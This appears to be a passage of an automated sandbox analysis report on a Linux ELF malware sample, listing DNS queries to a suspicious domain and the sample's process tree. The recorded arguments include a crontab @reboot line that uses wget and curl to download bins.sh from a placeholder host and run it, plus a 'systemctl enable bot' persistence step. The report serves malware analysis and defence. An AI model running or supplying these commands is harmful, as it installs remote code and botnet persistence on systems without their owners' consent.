                              Nov 20, 2024 00:57:57.332869053 CET192.168.2.131.1.1.10x5cd5Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:58:02.338977098 CET192.168.2.131.1.1.10x5cd5Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:58:05.600140095 CET192.168.2.131.1.1.10xd76dStandard query (0)ch.archive.ubuntu.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:58:07.342664003 CET192.168.2.131.1.1.10x5cd5Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:58:12.346016884 CET192.168.2.131.1.1.10x5cd5Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:58:21.100701094 CET192.168.2.131.1.1.10xd76dStandard query (0)ch.archive.ubuntu.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:58:36.600176096 CET192.168.2.131.1.1.10xd76dStandard query (0)ch.archive.ubuntu.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:58:37.355235100 CET192.168.2.131.1.1.10xe658Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:58:42.358175039 CET192.168.2.131.1.1.10xe658Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:58:47.364419937 CET192.168.2.131.1.1.10xe658Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:58:52.370511055 CET192.168.2.131.1.1.10xe658Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 00:58:57.374459028 CET192.168.2.131.1.1.10xe658Standard query (0)host.zopz-api.comA (IP address)IN (0x0001)false

                              System Behavior

                              Start time (UTC):23:57:02
                              Start date (UTC):19/11/2024
                              Path:/tmp/armv5l.elf
                              Arguments:/tmp/armv5l.elf
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:57:02
                              Start date (UTC):19/11/2024
                              Path:/tmp/armv5l.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:57:02
                              Start date (UTC):19/11/2024
                              Path:/tmp/armv5l.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:57:06
                              Start date (UTC):19/11/2024
                              Path:/tmp/armv5l.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:57:06
                              Start date (UTC):19/11/2024
                              Path:/tmp/armv5l.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:57:06
                              Start date (UTC):19/11/2024
                              Path:/tmp/armv5l.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:57:06
                              Start date (UTC):19/11/2024
                              Path:/bin/sh
                              Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:57:06
                              Start date (UTC):19/11/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:57:06
                              Start date (UTC):19/11/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:57:06
                              Start date (UTC):19/11/2024
                              Path:/usr/bin/crontab
                              Arguments:crontab -l
                              File size:43720 bytes
                              MD5 hash:66e521d421ac9b407699061bf21806f5

                              Start time (UTC):23:57:07
                              Start date (UTC):19/11/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:57:07
                              Start date (UTC):19/11/2024
                              Path:/usr/bin/chmod
                              Arguments:chmod +x bins.sh
                              File size:63864 bytes
                              MD5 hash:739483b900c045ae1374d6f53a86a279

                              Start time (UTC):23:57:07
                              Start date (UTC):19/11/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:57:07
                              Start date (UTC):19/11/2024
                              Path:/usr/bin/sh
                              Arguments:sh bins.sh
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:57:07
                              Start date (UTC):19/11/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:57:07
                              Start date (UTC):19/11/2024
                              Path:/bin/curl
                              Arguments:/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
                              File size:239848 bytes
                              MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                              Start time (UTC):23:57:09
                              Start date (UTC):19/11/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:57:09
                              Start date (UTC):19/11/2024
                              Path:/usr/bin/chmod
                              Arguments:chmod +x bins.sh
                              File size:63864 bytes
                              MD5 hash:739483b900c045ae1374d6f53a86a279

                              Start time (UTC):23:57:09
                              Start date (UTC):19/11/2024
                              Path:/usr/bin/sh
                              Arguments:sh bins.sh
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:57:06
                              Start date (UTC):19/11/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:57:06
                              Start date (UTC):19/11/2024
                              Path:/usr/bin/crontab
                              Arguments:crontab -
                              File size:43720 bytes
                              MD5 hash:66e521d421ac9b407699061bf21806f5

                              Start time (UTC):23:57:09
                              Start date (UTC):19/11/2024
                              Path:/tmp/armv5l.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:57:09
                              Start date (UTC):19/11/2024
                              Path:/bin/sh
                              Arguments:sh -c "/bin/systemctl enable bot"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:57:09
                              Start date (UTC):19/11/2024
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:57:09
                              Start date (UTC):19/11/2024
                              Path:/bin/systemctl
                              Arguments:/bin/systemctl enable bot
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Start time (UTC):23:57:09
                              Start date (UTC):19/11/2024
                              Path:/usr/lib/systemd/systemd
                              Arguments:-
                              File size:1620224 bytes
                              MD5 hash:9b2bec7092a40488108543f9334aab75

                              Start time (UTC):23:57:09
                              Start date (UTC):19/11/2024
                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              File size:22760 bytes
                              MD5 hash:3633b075f40283ec938a2a6a89671b0e